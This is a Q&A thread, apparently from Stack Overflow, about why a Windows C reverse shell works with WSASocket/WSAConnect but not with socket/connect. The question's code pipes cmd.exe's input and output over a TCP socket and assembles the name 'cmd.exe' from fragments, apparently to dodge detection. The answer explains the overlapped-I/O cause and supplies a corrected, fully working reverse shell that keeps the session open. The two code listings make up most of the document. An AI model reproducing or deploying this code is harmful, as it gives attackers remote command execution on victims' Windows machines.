# Why is WSAConnect working and connect(); not?

Tags: c, winsock

I'm experimenting with some reverse shell code in C. It is working but only if I use `WSAConnect()` and `WSASocket()`. If I use `socket()` or `connect()` instead, it's not working. Why is this?

I always use `connect()` instead of `WSAConnect()`, and `socket()` instead of `WSASocket()`. I know I am missing something.

```c
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

WSADATA wsa;
SOCKET sock;
struct sockaddr_in server;
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;


int main(int argc, char *argv[]) 
{
    WSAStartup(MAKEWORD(2,2), &wsa);
    // sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); This also doesn't work
    sock = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);


    server.sin_family = AF_INET;
    server.sin_port = htons(4942);
    server.sin_addr.s_addr =inet_addr("127.0.0.1");

    // connect(sock, (struct sockaddr*)&server, sizeof(server)); This doesn't work
    WSAConnect(sock,(SOCKADDR*)&server, sizeof(server),NULL,NULL,NULL,NULL);
    if (WSAGetLastError() == 0) {

        memset(&sinfo, 0, sizeof(sinfo));

        sinfo.cb=sizeof(sinfo);
        sinfo.dwFlags=STARTF_USESTDHANDLES;
        sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)sock;

        char *myArray[4] = { "cm", "d.e", "x", "e" };
        char command[8] = "";
        snprintf( command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);

        CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
        exit(0);
    } else {
        exit(0);
    }    
}
```

Comment: What does `WSAGetLastError` report after `socket` / `connect` fail?

Comment: Tried both. No errors are coming. The shell just isn't popping up if I use ``socket();`` and ``connect();``.

Comment: If `socket()` or `connect()` fail, `WSAGetLastError()` will not return 0, unless you are doing something to wipe out the error code before you retrieve it. Please provide a [mcve] that demonstrates `socket()`+`connect()` failing. The way you are using `WSAGetLastError()` to check if `WSAConnect()` fails is wrong, don't call `WSAGetLastError()` unless `WSAConnect()` returns `SOCKET_ERROR`, which you are not checking for. The code shown is not doing ANY error checking properly. You need to fix that. Also, what kind of TCP server are you trying to connect to exactly? Is the server even listening?

Comment: The server side is netcat. I get **"Too many output retries"**

Comment: That message means netcat is not able to send data to a connected client. It gives up after 8200 failed attempts to write data (see the [netcat source code](https://github.com/diegocr/netcat/blob/master/netcat.c)). But you claim that your client is not even able to connect to netcat to begin with. So which is it? Either you are connecting, or you are not. Hard to know since your code is doing improper error checking. Did you try fixing that yet?

Answer (score 4):

There are some differences between `socket()` and `WSASocket()`.  Most notably:

- by default, `socket()` creates a `SOCKET` that supports Overlapped I/O, whereas `WSASocket()` allows you to specify whether you want the `SOCKET` to support Overlapped I/O or not.  In other words, by default, `socket()` is the same as calling `WSASocket()` with the `WSA_FLAG_OVERLAPPED` flag.  But `CreateProcess()` I/O redirection requires `HANDLE`s that are non-Overlapped.  Which is why your use of `socket()` doesn't work.
- `WSASocket()` allows you to create a socket using a specific provider, whereas `socket()` uses a default provider (usually Microsoft's).  When using a `SOCKET` directly for `CreateProcess()` I/O redirection, you need to ensure the `SOCKET`'s provider actually supports that usage.  To ensure that, you should use `WSAEnumProtocols()` to enumerate the installed protocols until you find one that supports TCP and has the `XP1_IFS_HANDLES` flag (Microsoft's provider does), and then you can have `WSASocket()` use that specific provider via its `lpProtocolInfo` parameter.

Every example I can find online for using a `SOCKET` to directly redirect `CreateProcess()` I/O uses `WSASocket()` (but not always `WSAEnumProtocols()`).  I have not seen a single example using `socket()` instead.

However, if you really want to use `socket()`, you have 2 choices:

- use `setsockopt(SOL_SOCKET, SO_OPENTYPE)` to turn off creation of overlapped sockets by specifying the `SO_SYNCHRONOUS_NONALERT` type.  Microsoft discourages this option, preferring the use of `WSASocket()` instead.
- use `CreatePipe()` instead for the actual I/O redirection, and then manually proxy data between the socket and pipe as needed, reading from the `SOCKET` to write to the pipe, and reading from the pipe to write to the `SOCKET`.

That said, your code is not performing error checking correctly.  Also, were you actually able to connect to the server and launch `cmd.exe`, you then exit from your app immediately, which closes the socket.  You need to keep the socket open for the lifetime of the `cmd.exe` process.

Try something more like this instead:

```
#include <winsock2.h>
#include <stdio.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

int main(int argc, char *argv[]) 
{
    WSADATA wsa;
    SOCKET sock;
    struct sockaddr_in server;
    STARTUPINFO sinfo;
    PROCESS_INFORMATION pinfo;

    int res = WSAStartup(MAKEWORD(2,2), &wsa);
    if (res != 0)
    {
        fprintf(stderr, "Can't initialize Winsock. Error %d\n", res);
        return 1;
    }

    // optional: use WSAEnumProtocols() to find a suitable WSAPROTOCOL_INFO
    // to pass to the lpProtocolInfo parameter of WSASocket()...

    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET)
    {
        res = WSAGetLastError();
        fprintf(stderr, "Can't create socket. Error %d\n", res);
        WSACleanup();
        return 1;
    }

    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons(4942);
    server.sin_addr.s_addr = inet_addr("127.0.0.1");

    res = WSAConnect(sock, (struct sockaddr*)&server, sizeof(server), NULL, NULL, NULL, NULL);
    if (res == SOCKET_ERROR)
    {
        res = WSAGetLastError();
        fprintf(stderr, "Can't connect. Error %d\n", res);
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    sinfo.dwFlags = STARTF_USESTDHANDLES;
    sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)sock;

    char *myArray[4] = { "cm", "d.e", "x", "e" };
    char command[8] = "";
    snprintf(command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);

    if (!CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo))
    {
        res = GetLastError();
        fprintf(stderr, "Can't create process. Error %d\n", res);
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    CloseHandle(pinfo.hThread);
    WaitForSingleObject(pinfo.hProcess, INFINITE);
    CloseHandle(pinfo.hProcess);

    closesocket(sock);
    WSACleanup();

    return 0;
}
```